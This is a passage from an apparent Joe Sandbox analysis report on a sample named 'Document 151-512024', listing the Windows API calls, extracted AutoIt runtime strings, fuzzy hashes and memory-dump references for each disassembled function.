                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                    • Opcode ID: d332ae570a383e85e289b6bfb814c6073a1ef8a96a0cb70d107c49aee2309cea
                                                                                                    • Instruction ID: 57a2b1e8610258db42a79ccf592935f5904f199f327a7fb0cf6738b1fc2912f7
                                                                                                    • Opcode Fuzzy Hash: d332ae570a383e85e289b6bfb814c6073a1ef8a96a0cb70d107c49aee2309cea
                                                                                                    • Instruction Fuzzy Hash: 19E187356487019FCB14DF24C450A2AB7E6BFD8314F10895EF8969B3A2D735ED49CB81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                    • API String ID: 1256254125-909552448
                                                                                                    • Opcode ID: b2b9222afbd40615096178d54f93326925729dca9948cf446c4b1eccf7a1c4cc
                                                                                                    • Instruction ID: b0a26c518009c99f4926edd8f0c6cd9b9862adb73eed6bb74acbcb62d62162e6
                                                                                                    • Opcode Fuzzy Hash: b2b9222afbd40615096178d54f93326925729dca9948cf446c4b1eccf7a1c4cc
                                                                                                    • Instruction Fuzzy Hash: 1F71F8B2E0052A8BCB10DE7CD951FBF3B999BA0790B11052CF85E97285E635DD45C3A2
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 009D835A
                                                                                                    • _wcslen.LIBCMT ref: 009D836E
                                                                                                    • _wcslen.LIBCMT ref: 009D8391
                                                                                                    • _wcslen.LIBCMT ref: 009D83B4
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009D83F2
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009D5BF2), ref: 009D844E
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009D8487
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009D84CA
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009D8501
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 009D850D
                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009D851D
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,009D5BF2), ref: 009D852C
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009D8549
                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009D8555
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                    • API String ID: 799131459-1154884017
                                                                                                    • Opcode ID: 6c1060d6bdbdfbf302342fd774c8b907e32f434a0a00857bb62fd37b81d01197
                                                                                                    • Instruction ID: 43426b3542c1dd2c8c6d9fdbf34051d6c66e431e2db2669526ba0c6e370b6ab8
                                                                                                    • Opcode Fuzzy Hash: 6c1060d6bdbdfbf302342fd774c8b907e32f434a0a00857bb62fd37b81d01197
                                                                                                    • Instruction Fuzzy Hash: 1761127198420ABEEB14CF64DC41BBF77ACFB44B10F10860AF815EA1D2DB74A980D7A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                    • API String ID: 0-1645009161
                                                                                                    • Opcode ID: 08968c6670606765012b531ae9e512db6b94d8f2e232fb81f86c09ad2d5d568b
                                                                                                    • Instruction ID: d5e40124536e9400182ac52a1f36ae20e54f27ee8004e3325164814c12e49b57
                                                                                                    • Opcode Fuzzy Hash: 08968c6670606765012b531ae9e512db6b94d8f2e232fb81f86c09ad2d5d568b
                                                                                                    • Instruction Fuzzy Hash: 51815B71A44209BBDB21BFA0DC43FAF77A8AF95340F018425F805AB292EB75D915C791
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000063), ref: 009A5A2E
                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009A5A40
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 009A5A57
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 009A5A6C
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 009A5A72
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 009A5A82
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 009A5A88
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009A5AA9
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009A5AC3
                                                                                                    • GetWindowRect.USER32(?,?), ref: 009A5ACC
                                                                                                    • _wcslen.LIBCMT ref: 009A5B33
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 009A5B6F
                                                                                                    • GetDesktopWindow.USER32 ref: 009A5B75
                                                                                                    • GetWindowRect.USER32(00000000), ref: 009A5B7C
                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009A5BD3
                                                                                                    • GetClientRect.USER32(?,?), ref: 009A5BE0
                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 009A5C05
                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009A5C2F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 895679908-0
                                                                                                    • Opcode ID: 209ccf3975526bdccdff1f5b4d5689f7fead167adec1a553729d58871e6f968c
                                                                                                    • Instruction ID: f889695cebf1f23f698a949fe64ad0fe98bbc20a0d215de28a241e804c45c1f2
                                                                                                    • Opcode Fuzzy Hash: 209ccf3975526bdccdff1f5b4d5689f7fead167adec1a553729d58871e6f968c
                                                                                                    • Instruction Fuzzy Hash: 9E718071A00B06AFDB20DFA8CE45B6EBBF9FF48705F114919E142A25A0D774E944DB60
                                                                                                    APIs
                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009600C6
                                                                                                      • Part of subcall function 009600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A1070C,00000FA0,92917CC1,?,?,?,?,009823B3,000000FF), ref: 0096011C
                                                                                                      • Part of subcall function 009600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009823B3,000000FF), ref: 00960127
                                                                                                      • Part of subcall function 009600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009823B3,000000FF), ref: 00960138
                                                                                                      • Part of subcall function 009600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0096014E
                                                                                                      • Part of subcall function 009600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0096015C
                                                                                                      • Part of subcall function 009600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0096016A
                                                                                                      • Part of subcall function 009600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00960195
                                                                                                      • Part of subcall function 009600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009601A0
                                                                                                    • ___scrt_fastfail.LIBCMT ref: 009600E7
                                                                                                      • Part of subcall function 009600A3: __onexit.LIBCMT ref: 009600A9
                                                                                                    Strings
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00960122
                                                                                                    • kernel32.dll, xrefs: 00960133
                                                                                                    • WakeAllConditionVariable, xrefs: 00960162
                                                                                                    • InitializeConditionVariable, xrefs: 00960148
                                                                                                    • SleepConditionVariableCS, xrefs: 00960154
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 66158676-1714406822
                                                                                                    • Opcode ID: a895f01612b7ac9ed4ec7627f78510a4c13728f523024b0c2200b5ebd879a260
                                                                                                    • Instruction ID: 48c71faa0a0ea6d4c397016901b2bc271431eeed148f78c51a4bf9cd2ad439c0
                                                                                                    • Opcode Fuzzy Hash: a895f01612b7ac9ed4ec7627f78510a4c13728f523024b0c2200b5ebd879a260
                                                                                                    • Instruction Fuzzy Hash: BF21297268D7126FD7109BA4AC96F6B3398EBC6B61F014527F802E33D1DBA49840CA90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                    • API String ID: 176396367-1603158881
                                                                                                    • Opcode ID: 025ad425bc1748f6df3472d2e51fd2f63b647fb67e07e9e33b73dffcd0c0a798
                                                                                                    • Instruction ID: 55038f3c237b34449daf11face9524ee20174483f21012eb751f60a10fdf3b5b
                                                                                                    • Opcode Fuzzy Hash: 025ad425bc1748f6df3472d2e51fd2f63b647fb67e07e9e33b73dffcd0c0a798
                                                                                                    • Instruction Fuzzy Hash: F9E1D232E00516ABCB14DFB8C451BEEFBA8BF56750F54C119F456A7240EB30AE858BD0
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,009DCC08), ref: 009B4527
                                                                                                    • _wcslen.LIBCMT ref: 009B453B
                                                                                                    • _wcslen.LIBCMT ref: 009B4599
                                                                                                    • _wcslen.LIBCMT ref: 009B45F4
                                                                                                    • _wcslen.LIBCMT ref: 009B463F
                                                                                                    • _wcslen.LIBCMT ref: 009B46A7
                                                                                                      • Part of subcall function 0095F9F2: _wcslen.LIBCMT ref: 0095F9FD
                                                                                                    • GetDriveTypeW.KERNEL32(?,00A06BF0,00000061), ref: 009B4743
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                    • Opcode ID: 297ae6070ad0bb4ef1806f74b3f50e4a31e5ed7c86922d43b588ad2dfa5d3ade
                                                                                                    • Instruction ID: e9ef08153df8add17f40b8733ab20967d47245bb57ec163f926af6cb4e2311a5
                                                                                                    • Opcode Fuzzy Hash: 297ae6070ad0bb4ef1806f74b3f50e4a31e5ed7c86922d43b588ad2dfa5d3ade
                                                                                                    • Instruction Fuzzy Hash: 1AB1F3716083029FC710DF28DA90AAAB7E9BFE6774F50491DF496C7292DB30D844DB92
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 009D6DEB
                                                                                                      • Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009D6E5F
                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009D6E81
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009D6E94
                                                                                                    • DestroyWindow.USER32(?), ref: 009D6EB5
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00940000,00000000), ref: 009D6EE4
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009D6EFD
                                                                                                    • GetDesktopWindow.USER32 ref: 009D6F16
                                                                                                    • GetWindowRect.USER32(00000000), ref: 009D6F1D
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009D6F35
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009D6F4D
                                                                                                      • Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                    • String ID: 0$0n$tooltips_class32
                                                                                                    • API String ID: 2429346358-2282341297
                                                                                                    • Opcode ID: fd85a23cfce3b1e914830fb3e070e05f2a893bb3dc138b1e84c4d740b458937e
                                                                                                    • Instruction ID: 21db47db15120829ffc68a7561ce9cc7aa3f9f1ae30459fff1310dcbd8435a62
                                                                                                    • Opcode Fuzzy Hash: fd85a23cfce3b1e914830fb3e070e05f2a893bb3dc138b1e84c4d740b458937e
                                                                                                    • Instruction Fuzzy Hash: 167178B4184245AFDB21CF18D844FAABBF9FB99304F44881EF99987360C770E946DB11
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 009D9147
                                                                                                      • Part of subcall function 009D7674: ClientToScreen.USER32(?,?), ref: 009D769A
                                                                                                      • Part of subcall function 009D7674: GetWindowRect.USER32(?,?), ref: 009D7710
                                                                                                      • Part of subcall function 009D7674: PtInRect.USER32(?,?,009D8B89), ref: 009D7720
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009D91B0
                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009D91BB
                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009D91DE
                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009D9225
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009D923E
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 009D9255
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 009D9277
                                                                                                    • DragFinish.SHELL32(?), ref: 009D927E
                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009D9371
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                    • String ID: 0n$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                    • API String ID: 221274066-2210429996
                                                                                                    • Opcode ID: 52426f408854968bfa610ac2291dee2ad5fbf961678d1dee9f560f89dea696e1
                                                                                                    • Instruction ID: a07e3ff8bc01bd648b98e1f6652ea445678ad83792ccad15988b285963d7c10f
                                                                                                    • Opcode Fuzzy Hash: 52426f408854968bfa610ac2291dee2ad5fbf961678d1dee9f560f89dea696e1
                                                                                                    • Instruction Fuzzy Hash: 2E617B71148301AFC701EF64DC85EAFBBE8EFC9750F404A1EF595922A1DB309A49CB52
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 009CB198
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009CB1B0
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009CB1D4
                                                                                                    • _wcslen.LIBCMT ref: 009CB200
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009CB214
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009CB236
                                                                                                    • _wcslen.LIBCMT ref: 009CB332
                                                                                                      • Part of subcall function 009B05A7: GetStdHandle.KERNEL32(000000F6), ref: 009B05C6
                                                                                                    • _wcslen.LIBCMT ref: 009CB34B
                                                                                                    • _wcslen.LIBCMT ref: 009CB366
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009CB3B6
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 009CB407
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009CB439
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009CB44A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009CB45C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009CB46E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009CB4E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178637699-0
                                                                                                    • Opcode ID: e41dc911deaf3e749bc283555f5d229cd734ed065f34c063ea407525f7d57f2c
                                                                                                    • Instruction ID: bc866131419ffaa3c215320c9b69047c7120bfdae4dcf7ca9dec04b0910b21fb
                                                                                                    • Opcode Fuzzy Hash: e41dc911deaf3e749bc283555f5d229cd734ed065f34c063ea407525f7d57f2c
                                                                                                    • Instruction Fuzzy Hash: B7F17A71A082409FC714EF24C892F6EBBE5AFC5714F14895DF8999B2A2DB31EC44CB52
                                                                                                    APIs
                                                                                                    • GetMenuItemCount.USER32(00A11990), ref: 00982F8D
                                                                                                    • GetMenuItemCount.USER32(00A11990), ref: 0098303D
                                                                                                    • GetCursorPos.USER32(?), ref: 00983081
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0098308A
                                                                                                    • TrackPopupMenuEx.USER32(00A11990,00000000,?,00000000,00000000,00000000), ref: 0098309D
                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009830A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 36266755-4108050209
                                                                                                    • Opcode ID: e848a629bd65690f9faafe9ce41c85bfe1d813d4d3b133ef2d13062006b085b6
                                                                                                    • Instruction ID: 5147f77b53c56699808052d7597554f9febd4e893544413dd6f8416b237e21db
                                                                                                    • Opcode Fuzzy Hash: e848a629bd65690f9faafe9ce41c85bfe1d813d4d3b133ef2d13062006b085b6
                                                                                                    • Instruction Fuzzy Hash: 18713C70644206BFEB219F74DC49F9ABF68FF45724F208216F6246A2E1C7B1AD50DB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00958F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00958BE8,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 00958FC5
                                                                                                    • DestroyWindow.USER32(?), ref: 00958C81
                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00958BBA,00000000,?), ref: 00958D1B
                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00996973
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 009969A1
                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 009969B8
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00958BBA,00000000), ref: 009969D4
                                                                                                    • DeleteObject.GDI32(00000000), ref: 009969E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
